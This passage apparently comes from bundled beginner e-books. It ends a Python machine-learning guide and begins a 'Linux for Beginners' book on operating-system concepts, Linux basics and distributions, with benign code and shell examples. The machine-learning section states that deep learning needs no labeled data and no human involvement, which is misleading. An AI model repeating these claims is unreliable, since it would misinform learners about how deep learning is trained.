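# Hypothetical labeled examples: each photo has been annotated with one
# structured feature (number of wheels) and a label.
labeled = [
    {"wheels": 2, "label": "bicycle"},
    {"wheels": 2, "label": "bicycle"},
    {"wheels": 6, "label": "truck"},
    {"wheels": 8, "label": "truck"},
]

# "Learning": find the threshold that separates the two labeled classes.
bike_max = max(x["wheels"] for x in labeled if x["label"] == "bicycle")
truck_min = min(x["wheels"] for x in labeled if x["label"] == "truck")
threshold = (bike_max + truck_min) / 2   # midpoint between the classes

def classify(wheels):
    return "truck" if wheels > threshold else "bicycle"
```

Everything hinges on the labels and the hand-chosen feature; without that structure, this kind of algorithm has nothing to learn from.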
How do we solve this problem in deep learning?
The approach in deep learning is different from what we have done in
machine learning. The benefit here is that in deep learning, you do not need
any labeled or structured data to help the model identify trucks from bicycles.
The artificial neural networks will identify the image data through the
different algorithm layers in the network. Each of the layers will identify and
define a specific feature in the photos. This is the same method that our
brains use when we try to solve some problems.
Generally, the brain considers a lot of possibilities, ruling out all the wrong
ones before settling on the correct one. Deep learning models will pass
queries through several hierarchical processes to find the solution. At each
identification level, the deep neural networks recognize some identifiers that
help in distinguishing bicycles from trucks.
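At its core, each "layer" is just a set of weighted sums followed by a simple non-linear function. This hand-written forward pass (the weights are hand-picked for illustration, not learned) shows how an input flows through a hidden layer to a single output score:

```python
import math

def relu(values):
    # Non-linearity applied after a layer: negatives become zero.
    return [max(0.0, v) for v in values]

def layer(inputs, weights, biases):
    # Each output neuron is a weighted sum of all inputs plus a bias.
    return [sum(w * x for w, x in zip(row, inputs)) + b
            for row, b in zip(weights, biases)]

x = [0.5, -0.2]                                  # toy input features
hidden = relu(layer(x, [[1.0, -1.0], [0.5, 0.5]], [0.0, 0.1]))
out = layer(hidden, [[1.0, -1.0]], [0.0])        # one output neuron
score = 1 / (1 + math.exp(-out[0]))              # sigmoid: squash to (0, 1)
```

In a real network there are many more layers and the weights are learned from data, but the data flow, layer after layer, each transforming the previous layer's output, is exactly this.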
This is the simplest way to understand how these two systems work. However,
neither deep learning nor machine learning is necessarily the right method
for every such problem. As you learn about the
differences between these two fields, you must remember that you have to
define the problem correctly, before you can choose the best approach to
implement in solving it. You will learn how to choose the right approach at a
later stage in your journey into machine learning, which has been covered in
the advanced books in this series.
From the example illustrated above, we can see that machine learning
algorithms need structured data to help them tell the difference between
trucks and bicycles. From this information, they can then produce the correct
output after identifying the classifiers.
In deep learning, however, your model can identify images of the trucks and
bicycles by passing information through several data processing layers in its
framework. There is no need for structured data. To make the correct
prediction, deep learning frameworks depend on the output provided at every
data processing layer. This information then builds up and presents the final
outcome. In this case, it rules out all possibilities to remain with the only
credible solution.
From our illustrations above, we have learned some important facts that will
help you distinguish deep learning from machine learning as you learn over
the years. We can summarize this in the following points:
● Data presentation
The primary difference between machine learning and deep learning is
evident in the way we introduce data into the respective models. With
machine learning models, you will almost always need to use structured data.
However, in deep learning, the networks depend on artificial neural network
layers to identify unique features that help to identify the data.
● Algorithms and human intervention
The emphasis of machine learning is on learning from different inputs and
usage patterns. Through such interaction, machine learning models produce
better output the longer they learn and the more interaction they receive.
To aid this cause, you must also try to provide as much new data as possible.
When you realize that the output presented is not what you needed, you must
retrain the machine learning model to deliver a better output. Therefore, for a
system that should work without human intervention, you will still have to be
present from time to time.
In deep learning, your presence is not needed. All the nested layers within the
neural networks process data at different levels. In the process, however, the
model might encounter errors and learn from them.
This is the same way that the human brain works. As you grow up, you learn
a lot of important life skills through trial and error. By making mistakes, your
brain learns the difference between positive and negative feedback, and you
strive to achieve positive results whenever you can.
To be fair, even in deep learning, your input will still be required. You cannot
confidently assume that the output will always be perfect. This particularly
applies when your input data is insufficient for the kind of output you
demand from the model.
The underlying factor here is that both machine learning and deep learning
must all use data. The quality of data you have will make a lasting impact on
the results you get from these models. Speaking of data, you cannot just use
any data you come across. To use either of these models effectively, you
must learn how to inspect data and make sure you are using the correct
format for the model you prefer.
Machine learning algorithms will often need labeled, structured data. For this
reason, they are not the best option if you need to find solutions to
sophisticated problems that need massive chunks of data.
In the example we used to identify trucks from bicycles, we tried to solve a
very simple issue in a theoretical concept. In the real world, however, deep
learning models are applied in more complex models. If you think about the
processes involved, from the concepts to hierarchical data handling and the
different number of layers that data must pass through, using deep learning
models to solve simple problems would be a waste of resources.
While all these classes of AI need data in order to deliver the intelligence
we require, deep learning models need significantly more data than machine
learning algorithms. This is because deep learning models must be highly
confident in an output before producing it.
Deep learning models can easily identify differences and concepts in the data
processing layers for neural networks only when they have been exposed to
millions of data points. This helps to rule out all other possibilities. In the
case of machine learning, however, the models can learn through criteria that
are already predetermined.
Different Use Cases
Having seen the difference between machine learning and deep learning,
where can these two be applied in the real world? Deep learning is a
credible solution when you deal with massive amounts of data that you need
to interpret and make decisions from, provided you have the resources such a
model demands.
Deep learning models are also recommended when dealing with problems
that are too complicated to solve using machine learning algorithms. Beyond
this, it is important to realize that deep learning models usually have a very
high resource demand. Therefore, you should consider deep learning models
when you have the necessary financial muscle and resource allocation to
obtain the relevant programs and hardware.
Machine learning is a feasible solution when working with structured data
that can be used to train different machine learning algorithms. There is a lot
of learning involved before the algorithms can perform the tasks requested.
You can also use machine learning to enjoy the benefits of artificial
intelligence without necessarily implementing a full-scale artificial
intelligence model.
Machine learning algorithms are often used to help or speed up automation
processes in businesses and industrial processes. Some common examples of
machine learning models in use include advertising, identity verifiers,
information processing, and marketing. These should help your business
position itself better in the market against the competition.
Conclusion
Now that we have come to the end of the book, I hope you have gathered a
basic understanding of what machine learning is and how you can build a
machine learning model in Python. One of the best ways to begin building a
machine learning model is to practice the code in the book, and also try to
write similar code to solve other problems. It is important to remember that
the more you practice, the better you will get. The best way to go about this is
to begin working on simple problem statements and solve them using the
different algorithms. You can also try to find new ways of solving the same
problem. Once you get the hang of the basic problems, you can move on to
more advanced methods.
Thanks for reading to the end!
Python Machine Learning may be the answer that you are looking for when it
comes to all of these needs and more. It is a simple process that can teach
your machine how to learn on its own, similar to what the human mind can
do, but much faster and more efficiently. It has been a game-changer in many
industries, and this guidebook tried to show you the exact steps that you can
take to make this happen.
There is just so much that a programmer can do when it comes to using
Machine Learning in their coding, and when you add it together with the
Python coding language, you can take it even further, even as a beginner.
The next step is to start putting some of the knowledge that we discussed in
this guidebook to good use. There are a lot of great things that you can do
when it comes to Machine Learning, and when we can combine it with the
Python language, there is nothing that we can’t do when it comes to training
our machine or our computer.
This guidebook took some time to explore a lot of the different things that
you can do when it comes to Python Machine Learning. We looked at what
Machine Learning is all about, how to work with it, and even a crash course
on using the Python language for the first time. Once that was done, we
moved right into combining the two of these to work with a variety of Python
libraries to get the work done.
You should always work towards exploring different functions and features
in Python, and also try to learn more about the different libraries like SciPy,
NumPy, PyRobotics, and Graphical User Interface packages that you will be
using to build different models.
Python is a high-level language that is both interpreted and object-
oriented. This makes it easy for anybody to understand how the language
works. You can also extend the programs that you build in Python onto other
platforms. Most of the inbuilt libraries in Python offer a variety of functions
that make it easier to work with large data sets.
You will now have gathered that machine learning, though it may seem
complex, can easily be understood. It is not a black box of undecipherable
terms, incomprehensible graphs, or difficult concepts. Machine learning is easy to
understand, and I hope the book has helped you understand the basics of
machine learning. You can now begin working on programming and building
models in Python. Ensure that you diligently practice since that is the only
way you can improve your skills as a programmer.
If you have ever wanted to learn how to work with the Python coding
language, or you want to see what Machine Learning can do for you, then
this guidebook is the ultimate tool that you need! Take a chance to read
through it and see just how powerful Python Machine Learning can be for
you.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO
LEARN LINUX OPERATING
SYSTEM WITH THE
PROGRAMMING TOOLS FOR
THE INSTALLATION,
CONFIGURATION AND
COMMAND LINE + TIPS ABOUT
HACKING AND SECURITY.

JOHN S. CODE
Table of Contents
Introduction
Chapter 1 Basic Operating System Concepts, Purpose and
Function
Chapter 2 Basics of Linux
Chapter 3 What are Linux Distributions?
Chapter 4 Setting up a Linux System
Chapter 5 Comparison between Linux and other Operating
Systems
Chapter 6 Linux Command Lines
Chapter 7 Introduction to Linux Shell
Chapter 8 Basic Linux Shell Commands
Chapter 9 Variables
Chapter 10 User and Group Management
Chapter 11 Learning Linux Security Techniques
Chapter 12 Some Basic Hacking with Linux
Chapter 13 Types of Hackers
Conclusion
Introduction
If you have picked up this book, you are inevitably interested in Linux, at
least to some degree. You may be interested in understanding the software, or
debating whether it is right for you. However, especially as a beginner, it is
easy to feel lost in a sea of information. How do you know what version of
Linux to download? Or how to even go about downloading it, to begin with?
Is Linux even right for you to begin with? All of those are valid questions,
and luckily for you, Linux for Beginners is here to guide you through all of it.
Linux is an operating system, much like iOS and Windows. It can be used on
laptops, large computer centers, on cell phones, and even smart fridges. If it
can be programmed, Linux can almost definitely be installed, thanks to
several features and benefits. Linux is small, secure, supported on other
devices, and incredibly easy to customize. With Linux, you can create a
setup that is exactly what you want, with privacy, security, and access to
plenty of free-to-use software. This means that, once you develop the
know-how, you can create a customized experience that does exactly what you
need, optimizing your setup for your own purposes.
As you read through this book, you will be given a comprehensive guide to
everything you need to know as a beginner to Linux. You will learn about
why and how to determine which distribution of Linux is right for you. You
will discover how to use the terminal, how to set up exactly what you will
need on your system, and more.
When you are able to make your customized setup however you see fit, this
means that you can make sure that you are always working within the
constraints of the hardware that you are using. This means that older
machines, which may struggle under a load of many modern operating
systems such as Windows 10, can be optimized and used to their fullest
potential without wasting valuable resources or processing power on aspects
that are unnecessary, redundant, or even just detrimental to whatever it is that
you need to do.
Ultimately, you will be provided with exactly what you need to know to get
started with Linux, from start to finish. You will even be provided with
several alternatives to Windows-specific applications that can be downloaded
and used while running Linux on your device. Everything will be provided in
the simplest terms possible, so you get a complete and thorough
understanding of exactly what you need to know if you wish to get started
with Linux. Between receiving several step-by-step guides, questions, and
lists of commands, you should have much of what you need to know to at
least get started with the installation of your own distribution of Linux!
Enjoy the journey!
Chapter 1 Basic Operating System Concepts,
Purpose and Function
Purpose of the Operating System
Operating systems serve two main purposes: first, they provide the user with
a convenient computing environment, and second, they ensure the efficient
and reliable operation of the computer. The first function is characteristic
of the OS as an extended machine, the second of the OS as a distributor of
hardware resources.
Operating System as an Extended Machine
Using the operating system, the application programmer (and, through their
programs, the user) should have the impression that they are working with an
advanced machine. The hardware itself is not well adapted for direct use in
applications. For example, if you consider working with I/O devices at the
command level of the respective controllers, you can see that the set of
such commands is limited and, for many devices, primitive. The operating
system hides this hardware interface and instead offers the programmer an
application programming interface built on higher-level concepts (called
abstractions).
For example, when working with a disk, a typical abstraction is a file. It
is easier to work with files than directly with a disk controller (there is
no need to consider moving the drive heads, starting and stopping the motor,
etc.), so the programmer can focus on the essence of the application. The
operating system is responsible for interacting with the disk controller.
This use of abstractions makes it easy for OS and application code to change
when migrating to new hardware. For example, if you install a new type of
disk device on your computer (provided that it is supported by the OS), all
its features will be taken into account at the OS level, and applications
will continue to use files as before. This characteristic of the system is
called hardware independence: the OS provides a hardware-independent
environment for executing applications.
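You can see this abstraction from the application side in any high-level language. In Python, for instance, the same few calls work whatever disk hardware sits underneath, because the OS translates them into controller commands (the file name here is just an example):

```python
import os
import tempfile

# Write and read a file through the OS's file abstraction; no drive
# heads, motors, or controller commands are visible at this level.
path = os.path.join(tempfile.gettempdir(), "demo_abstraction.txt")

with open(path, "w") as f:
    f.write("hello, operating system\n")

with open(path) as f:
    contents = f.read()

os.remove(path)   # the OS also handles reclaiming the disk space
```

Swap the disk for an SSD or a network share and this code does not change; only the OS-level drivers do.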
Operating System as a Resource Allocator
The operating system must allocate resources efficiently. It acts as the
manager of these resources and provides them to applications on demand.
There are two main types of resource allocation. In the case of spatial
distribution, a resource is accessed by multiple clients simultaneously,
each using a part of it (this is how shared memory is distributed). In the
case of temporal distribution, the system queues requests and, according to
that queue, allows each client to use the entire resource for a limited time
(this is how the processor is distributed in single-processor systems).
When allocating resources, the OS resolves possible conflicts, prevents
programs from accessing resources to which they have no rights, and ensures
the efficient operation of the computer system.
Classification of Modern Operating Systems
Consider the classification of modern operating systems depending on their
scope. First of all, note the OSes of large computers (mainframes). The main
characteristic of the hardware for which they are designed is I/O
performance: large computers drive a large number of peripherals (disks,
printers, terminals, etc.). Such a computer system is used for the reliable
processing of large amounts of data, and the OS should support this
effectively (in batch mode or with time sharing). An example of an OS in
this class is IBM's OS/390.
The following category includes server operating systems. The main feature
of such operating systems is the ability to serve a large number of user
requests for shared resources. Network support plays an important role for
them. There are specialized server OSes that exclude elements that are not
related to the performance of their basic functions (for example, support for
user applications). Universal systems (UNIX or Windows XP systems) are now
more commonly used to implement servers.
The largest category is the personal OS. Some operating systems in this
category, such as Microsoft's Windows 95/98/Me, were developed as simplified
versions of universal OSes aimed at individual users. Particular attention
in personal OSes is given to support for the graphical user interface and
multimedia technologies.
There is also the real-time OS. In such a system, each operation must be
guaranteed to complete within a specified time range. A real-time OS can
control the flight of a spacecraft, an industrial process, or video
playback. Examples of specialized real-time OSes include QNX and VxWorks.
Another category is the embedded OS. These include control applications for
various microprocessor systems used in military technology, consumer
electronics, smart cards, and other devices. Such systems face special
requirements: fitting into a small amount of memory and supporting
specialized devices. Often an embedded OS is developed for a specific
device; more universal options include embedded Linux and Windows CE.
Functional Components of Operating Systems
An operating system can be considered as a set of components, each of which
is responsible for the implementation of a specific function of the
system. Consider the most important features of the modern OS and the
components that implement them.
The way the system is built from components and their relationship is
determined by the architecture of the operating system. Each operating
system is going to be a bit different in the kind of work that it can handle, and
its organizational structure, so learning this and how to put it all together can
be important.
Process and Flow Management
One of the most important functions of an OS is to execute applications.
Application code and data are stored on disk in a special executable file
format. When the user decides to run a program (or the OS does so itself),
the system creates a basic unit of computation called a process. Put simply,
a process is a program in execution.
The operating system allocates resources between processes. These resources
include CPU time, memory, devices, and disk space in the form of files. To
allocate memory, each process is given its own address space: the set of
memory addresses it is permitted to access. The process's code and data are
stored in that address space. Disk space is allocated similarly; for each
process, a list of open files is maintained.
The processes protect the resources they possess. For example, the process
address space cannot be accessed directly from other processes (it is secure),
and when working with files, a mode can be specified that denies access to
the file to all processes except the current one.
The allocation of processor time between processes is necessary because the
processor executes instructions one at a time (i.e., at any given moment,
only one process can physically execute on it), while to the user the
processes should appear as sequences of instructions executed in parallel. To
achieve this effect, the OS gives the processor to each process for a short
time, after which it switches the processor to another process; execution of
each process resumes from the place where it was interrupted. In
a multiprocessor system, processes can run in parallel on different processors.
In addition to processes, modern operating systems support multithreading: a
process may contain several sequences of instructions (threads), which appear
to the user to run in parallel, much like processes do. Unlike processes,
threads do not provide resource protection (for example, they share the
address space of their parent process).
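The process abstraction can be seen from the shell: every backgrounded command becomes a separate process with its own PID, which the OS schedules independently. A minimal sketch, using only POSIX shell built-ins plus the sleep utility:

```shell
# Launch a long-running command as a separate process (in the background).
sleep 5 &
pid=$!                       # PID the OS assigned to the new process

# kill -0 delivers no signal; it only asks the OS whether the process exists.
if kill -0 "$pid" 2>/dev/null; then
  echo "process $pid is running"
fi

kill "$pid"                  # terminate it; the OS reclaims its resources
wait "$pid" 2>/dev/null      # collect its exit status
echo "process $pid reaped"
```

The shell itself is just another process here; `$!` and `wait` are the interface it exposes to the OS's process management.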
Memory Management
While executing the code, the processor takes instructions and data from the
computer's (main) memory. This memory is displayed as an array of bytes,
each of which has an address.
Main memory is a resource shared between processes, and the OS is responsible
for allocating it. A process's address space is protected for the duration of
the process and released only after the process completes. The amount of
memory allocated to a process can vary over the course of its execution.
The OS must be able to run programs whose size, individually or in aggregate,
exceeds the available main memory. To this end, it implements virtual memory.
This technology keeps in main memory only those instructions and data that
are needed at the current time, while the contents of the rest of the address
space are stored on disk.
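On Linux, the kernel's view of physical and virtual memory can be read directly from the proc file system; the exact values will of course differ per machine:

```shell
# System-wide totals: physical RAM and the swap area backing virtual memory.
grep -E '^(MemTotal|MemFree|SwapTotal)' /proc/meminfo

# Per-process view: the current shell's address space.
# VmSize is virtual memory and is usually far larger than VmRSS,
# the portion actually resident in RAM right now.
grep -E '^(VmSize|VmRSS)' /proc/$$/status
```

The gap between VmSize and VmRSS is virtual memory at work: most of the address space is backed by disk, not RAM.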
I/O Management
The operating system is responsible for managing the I/O devices connected to
the computer. Support for such devices in the OS is usually provided at two
levels. The first, lower level consists of device drivers: software modules
that control devices of a particular type, taking all their features into
account. The second level provides a uniform I/O interface convenient for use
in applications.
The OS should implement a common driver interface through which drivers
interact with other system components. This interface makes it easy to add
drivers for new devices. Modern OSes provide a large selection of ready-made
drivers for specific peripherals; the more devices an OS supports, the better
its chances of practical use.
File Management and File Systems
For OS users and programmers, disk space is presented as a set
of files organized into a file system. A file is a named collection of data
that can be accessed by that name. The term "file system" can refer to two
concepts: the principle of organizing data in the form of files, and a
specific set of data (usually the corresponding part of a disk) organized in
accordance with this principle. An OS can support several file systems
simultaneously.
File systems are considered at the logical and physical levels. The logical
level defines the external representation of the system as a collection of files
(usually located in directories), as well as performing operations on files and
directories (creation, deletion, etc.). The physical layer defines the principles
of allocation of data structures of the file system on the drive.
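Both levels are visible from the shell: ordinary commands operate on the logical level, while a utility such as df reports the physical file system backing a directory. A small sketch (the fsdemo directory name is arbitrary):

```shell
# Logical level: create, list, and delete files by name.
mkdir -p fsdemo
echo "hello" > fsdemo/notes.txt
ls -l fsdemo                 # shows notes.txt with its size and permissions

# Physical level: which file system type backs the current directory
# (ext4, xfs, tmpfs, ... depending on the machine).
df -T . | tail -1

rm -r fsdemo                 # remove the file and its directory
```

The same `ls` works identically whether the directory lives on ext4 or xfs; that independence is exactly what the logical/physical split provides.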
Network Support
Network systems
Modern operating systems are adapted to work on the network, they are
called network operating systems. Networking support enables the OS to:
❖ To make local resources (disk space, printers, etc.) publicly available
over the network, ie to function as a server
❖ Refer to other computer resources through a network that is
functioning as a client
Both server and client functionality rely on transport facilities responsible
for transmitting data between computers according to the rules defined by
network protocols.
Distributed systems
Network OSes do not hide the presence of a network from the user. Network
support in them does not determine the structure of the system but enriches
it with additional capabilities. There are also distributed OSs that
allow pooling the resources of several computers in a distributed system. It
appears to the user as one computer with multiple processors working in
parallel. Distributed and multiprocessor systems are two major categories of
OS that use multiple processors.
Data security
Data security in the OS means ensuring the reliability of the system (data
protection against loss in case of failure) and protection of data against
unauthorized access (accidental or intentional). To protect against
unauthorized access, the OS should provide user authentication (means to
determine whether users are actually who they claim to be, usually via
passwords) and authorization (verifying that an authenticated user has the
right to perform a specific operation).
User Interface
There are two types of user interface: the command interpreter (shell) and
the graphical user interface (GUI). The command interpreter lets users
interact with the OS using a special command language, either interactively
or by executing batch files (scripts). Commands of this language instruct the
OS to perform certain actions (for example, run applications or work with files).
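A batch file is nothing more than a text file of such commands. A minimal sketch (the script name hello.sh is arbitrary):

```shell
# Write a two-line "batch file" (shell script) to disk.
cat > hello.sh <<'EOF'
#!/bin/sh
echo "Hello from the command interpreter"
EOF

chmod +x hello.sh    # mark it executable
./hello.sh           # prints: Hello from the command interpreter
```

The `#!/bin/sh` first line tells the OS which command interpreter should execute the rest of the file.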
The graphical user interface allows the user to interact with the OS by
opening windows and executing commands with menus or buttons. There are
different approaches to implementing a GUI: in Windows, its support is built
into the system, while in UNIX it is external to the system and relies on
standard I/O facilities.
Conclusions
❖ An operating system is a level of software that lies between the levels
of applications and computer hardware. Its main purpose is to make computer
systems easier to use and to improve their efficiency.
❖ The main functional components of an OS include process management,
memory management, I/O management, file management and file system support,
network support, data protection, and user interface implementation.
Chapter 2 Basics of Linux
Linux provides a complete operating system with low-level hardware control
and full resource management, following the decades-old UNIX tradition of
stability and power. Because this excellent architecture runs on ordinary PCs
(x86 systems), many software developers have gradually moved their efforts to
it, so the Linux operating system also has a wealth of applications.
Strictly speaking, Linux is only the kernel and its core tools, but the
integration of the kernel and tools with software provided by developers
makes Linux a complete and powerful operating system.
Why Linux Matters
Now that we know what Linux is, let's talk about what Linux is currently used
for. Because the Linux kernel is so small and delicate, it can run in many
environments that emphasize power savings and low hardware requirements.
Because Linux distributions integrate a lot of great software (whether
proprietary or free), Linux is also quite suitable for everyday use on
personal computers. Traditionally, the most common applications of Linux can
be roughly divided into enterprise applications and personal applications,
and the popularity of cloud computing in recent years has made Linux even
more powerful. The sections below describe a few real-life applications of Linux.
Utilization of the Enterprise Environment
The goal of digitalization is to provide consumers or employees with
information about products (such as web pages) and to keep data consistent
across the enterprise (such as unified account management and file management
systems). In addition, businesses that emphasize mission-critical
applications, such as the financial industry with its databases and security
requirements, have adopted Linux in their environments.
Web Server:
This is currently the most popular application of Linux. Inheriting UNIX's
tradition of high stability, Linux is particularly stable and powerful in its
networking functions. Moreover, thanks to the GNU project and the GPL model,
much excellent software has been developed on Linux, and most of this server
software is free software. Therefore, for server roles such as web (WWW)
servers, mail servers, and file transfer servers, Linux is an excellent
choice. This is the strength of Linux and the main reason for its popularity
among programmers and network engineers. Indeed, demand for Linux servers is
so strong that many hardware vendors specify the supported Linux
distributions when launching their products.
Mission critical applications (financial databases, Large Enterprise
Network Management Environment)
Due to the high performance and low price of personal computers, financial
and large-enterprise environments have gradually moved to Intel-compatible
x86 hosts. In addition, much of the software these enterprises use was
originally written for the UNIX operating system platform, which eases the
move to Linux.
High performance computing tasks for academic institutions:
Academic institutions often need to develop their own software, so the demand
for an operating system that doubles as a development environment is very
strong. Universities of science and technology, for instance, need this kind
of environment for research and graduation projects. Examples include fluid
mechanics in engineering, special effects in entertainment, working platforms
for software developers, and more. Linux delivers a lot of computing power,
since its creator cared deeply about performance, and it enjoys wide support
from the GCC compiler suite, so its advantages in this area are obvious.
Why is Linux better than Windows for hackers?
1. Open source
Open source software is software whose source code is open to the public. It
can even be modified if you have the skills, and you can redistribute it with
your own features. Open source software and operating systems help people
excel in their skill set. Being open source, Linux is free to install, unlike
Windows, which costs a considerable amount of money.
2. Freedom
Hackers need freedom, and Linux is free in every sense. The source code of
the system is open, and you can explore it freely; it is easy to break
things, but that is part of the fun. You can make adjustments as you like and
customize the system to your own or your company's requirements, and it
remains flexible every time. Windows, by contrast, restricts its users in
many areas.
3. Used in servers
Not only is Linux free, it is also lightweight and works well on servers. Red
Hat, the famous server platform, is a Linux distribution. Many hosting
companies and websites use Linux for their servers, so for a hacker working
against client-server targets, Linux is very convenient and flexible.
4. Many types
The best thing about Linux is the number of choices you can make in the
form of distributions. Hackers can use distributions like Kali and Parrot
which are preinstalled with hacking tools to enhance their performance which
otherwise is a very tedious work to install every software in Windows.
5. Light
The Linux operating system is very lightweight and suffers far fewer lags and
crashes than Windows. As a hacker, you have to do a lot of work across
different terminals, so a fast and light environment like Linux is important
for smooth performance.
6. Stable Operation
Linux works quite stably: its network functions and security are well thought
out, so the system is robust. Being able to use it with peace of mind is
another feature of Linux. In fact, many corporate sites and web services run
on Linux, which shows that it is a reliable OS.
Chapter 3 What are Linux Distributions?
When you get Linux for your computer, you are essentially getting a Linux
distribution. Just like other popular operating systems, you get an
installation program that includes the kernel, a graphical user interface, a
desktop, and a bunch of applications you can use right away once you install
Linux on your computer. The added bonus is that you also get access to the
source code for the kernel and the applications, which allows you to tweak
them to operate the way you want in the future.
While you can add desktop environments, apps, and drivers that don’t come
with your distribution, you will need to find the distribution that will give you
the ideal setup that you have in mind. Doing so will save you the time that
you may need to spend on finding apps and other programs that will work
best with the Linux that you have installed, which can get in the way of
setting up the system just the way you want it.
What Comes with a Distro?
1. GNU software
Most of the tasks that you will be performing using Linux involve GNU
software. These are utilities that you can access using the text terminal, or the
interface that looks like a Windows command prompt where you enter
commands. Some of the GNU software that you will be using are the
command interpreter (also known as the bash shell) and the GNOME GUI.
If you are a developer, you can make changes to the kernel or create your own
software for Linux using the GNU C and C++ compilers (these already come with
the GNU software in your Linux distro). You will also be using GNU software
whenever you edit code or text files with the emacs or ed editors.
Some of the most popular GNU software packages that you may encounter as you
explore Linux utilities are the bash shell, the coreutils file and text
utilities, the gcc compiler collection, the emacs editor, the gdb debugger,
and the tar and gzip archiving tools.
2. Applications and GUIs
Since you will not want to type string after string of commands on a
command terminal just for your computer to do something, you will want to
navigate and use programs in your computer using a GUI or a graphical user
interface. A GUI enables you to click on icons and pull up windows that will
help you use a program easier.
Most of the distros use the K Desktop Environment (KDE), or the GNU
Object Model Environment (GNOME). If you have both environments
installed on your computer, you can choose which desktop will serve as the
default, or you can switch between them from time to time. Both these
desktops have a similar feel to Mac OS and Windows desktops. It is also
worth noting that GNOME comes with a graphical shell called Nautilus, which
makes Linux configuration, file search, and application loading easier.
Should you need a command prompt, all you have to do is click the terminal
window's icon in either desktop environment.
Apart from GUIs, any average computer user will also need to use
applications: programs that perform everyday computing tasks.
While you may not have access to the more popular programs that you may
have used in a Mac or Windows computer, Linux can provide open-source
alternatives that you can try out. For example, instead of having to buy
Adobe Photoshop, you can try out the GIMP, which is a program that works
just as great when it comes to working with images.
Linux also offers productivity software packages that fulfill the bulk of an
ordinary computer user's needs. You can get office productivity apps for word
processing, databases, and spreadsheets from LibreOffice.org or
OpenOffice.org.
Tip: If you want to install MS applications to Linux (e.g., Microsoft office),
you can use CrossOver Office.
3. Networks
Linux lets you find everything you need over a network and exchange
information with other computers. It does this through TCP/IP (Transmission
Control Protocol/Internet Protocol), the protocol suite that lets you surf
the web and communicate with any server or computer out there.
4. Internet servers
Linux supports Internet services, such as the following:
Email
News services
File transfer utilities
World Wide Web
Remote login
Any Linux distro can offer these services, as long as there is an Internet
connection and the computer is configured with Internet server software:
special programs that allow a Linux computer to send information to other
computers. Here are common servers that you will encounter in Linux:
in.telnetd – allows you to log in to a different system via the
internet, with the aid of a protocol called TELNET
sendmail – serves as a mail server which allows exchange of
emails between two systems using the Simple Mail Transfer
Protocol (SMTP)
innd – allows you to view news using the Network News
Transfer Protocol (NNTP), which enables you to access a news
server in a store-and-forward way
Apache httpd – allows you to send documents to another
system using the HyperText Transfer Protocol (HTTP)
vsftpd – allows you to send a file to another computer using the
File Transfer Protocol (FTP)
sshd – allows you to log in to a computer securely over the
internet, using the Secure Shell (SSH) protocol
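Each of these servers listens on a well-known port number defined for its protocol; the values below are the standard IANA assignments:

```shell
# Print the standard port for each protocol mentioned above.
for entry in 21:FTP 22:SSH 23:TELNET 25:SMTP 80:HTTP 119:NNTP; do
  port=${entry%%:*}        # text before the colon
  proto=${entry##*:}       # text after the colon
  echo "port $port -> $proto"
done
```

This is why, for example, a browser contacting a web server defaults to port 80 unless told otherwise.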
5. Software Development
Linux is a developer's operating system: an environment fit for developing
software. Right out of the box, it is rich with software development tools,
such as a compiler and code libraries for building programs. If you have a
background in the C language and Unix, Linux should feel like home. It offers
the basic tools you may have used on Unix workstations from vendors such as
Sun Microsystems, HP (Hewlett-Packard), and IBM.
6. Online documentation
After some time, you will want to look up more information about Linux
without having to pull up this book. Fortunately, enough Linux documentation
is published online to help you in situations such as recalling the syntax of
a command. To pull this information up quickly, all you need to do is type
"man" followed by a command name at the command line to get the manual page
for that command. You can also get help from your desktop by using its help
option or icon.
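For example (assuming the man pages are installed, as on most desktop distros; the --help flag is a fallback that nearly every GNU tool supports):

```shell
# Show the manual page for ls; "| head" keeps only the first lines
# so the interactive pager does not open.
if command -v man >/dev/null; then
  man ls | head -15
  man -k copy | head -5    # search page descriptions for a keyword
else
  ls --help | head -5      # most GNU tools also describe themselves
fi
```

`man -k` (equivalent to the apropos command) is handy when you remember what a command does but not its name.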
Things to Consider When Choosing Distros
What is the best Linux distro (short for distribution) is for you? Here are
some things that you may want to keep in mind:
Package managers
One of the major factors separating distros from one another is the package
manager they come with. As you might expect, some package managers are easier
to use from the command line than others when you are installing software.
Beyond ease of use, you also need to consider package availability. Some
distros are less popular than others, which means fewer apps are packaged for
them. If you are starting out on Linux, it is a good idea to pick a distro
that offers both easy navigation from the get-go and a wide range of apps you
may want to install in the future.
Desktop environment
You will want a distro whose desktop works well with your computing needs:
one with good customization options and easy-to-find windows and menus. You
will also want to make sure that the desktop has efficient resource usage and
integrates well with the apps you plan to use.
While it is possible to install another desktop environment later, you will
still want the desktop that comes with your distro to resemble the desktop
you really want. This way, you will not have to spend too much effort setting
up every app you want quick access to, and you can be sure all your
applications work well together.
Hardware Compatibility
Different distros include different drivers in their installation packages,
which means each has a recommended set of hardware on which it works
seamlessly. You can, of course, hunt down other driver sources that work with
your existing hardware, but that only creates more work before everything
runs properly. To avoid this trouble, check the distro's compatibility page
and see whether all your computer peripherals work out of the box with your
Linux distribution.
Stability and Being Cutting Edge
Different distributions put different priorities on stability and updates to get
the latest version of applications and packages. For example, the distro
Debian tends to delay getting some application updates to make sure that
your operating system remains stable. This may not be suitable for certain
users that prefer to always get the latest version of applications and get the
latest features.
Fedora, on the other hand, performs quite the opposite – it is focused on
getting all your programs and features up to date and ensures that you always
have the greatest and the latest wares for your Linux. However, this may
happen at the expense of stability of the app, which may prompt you to roll
back to the previous version.

Community Support
Linux is all about the community that continuously provides support to this
operating system, from documentation to troubleshooting. This means that
you are likely to get the resources that you need when it comes to managing a
particular distribution if it has a large community.
Great Distros to Try
Now that you know what makes a Linux distribution great and you are about
to shop for the distro that you are going to install, you may want to check
these distributions that may just work well for you:
1. Ubuntu
Ubuntu is largely designed to make Linux easy to use for an average
computer user, which makes it a good distribution for every beginner. This
distro is simple, updates every six months, and has a Unity interface, which
allows you to use features such as a dock, a store-like interface for the
package manager, and a dashboard that allows you to easily find anything on
the OS. Moreover, it also comes with a standard set of applications that
works well with most users, such as a torrent downloader, a Firefox web
browser, and an app for instant messaging. You can also expect great support
from its large community.
2. Linux Mint
This distro is based on Ubuntu but is designed to make things even easier for
any user that has not used Linux in the past – it features familiar menus and is
not limited to just making you use open source programs. This means that
you can get programs that are standard in popular operating systems such as
.mp3 support and Adobe Flash, as well as a number of proprietary drivers.
3. Debian
If you want to be cautious and you want to see to it that you are running a
bug-free and stable computer at all times, then this is probably the distro for
you. Its main thrust is to make Linux a completely reliable system, but this
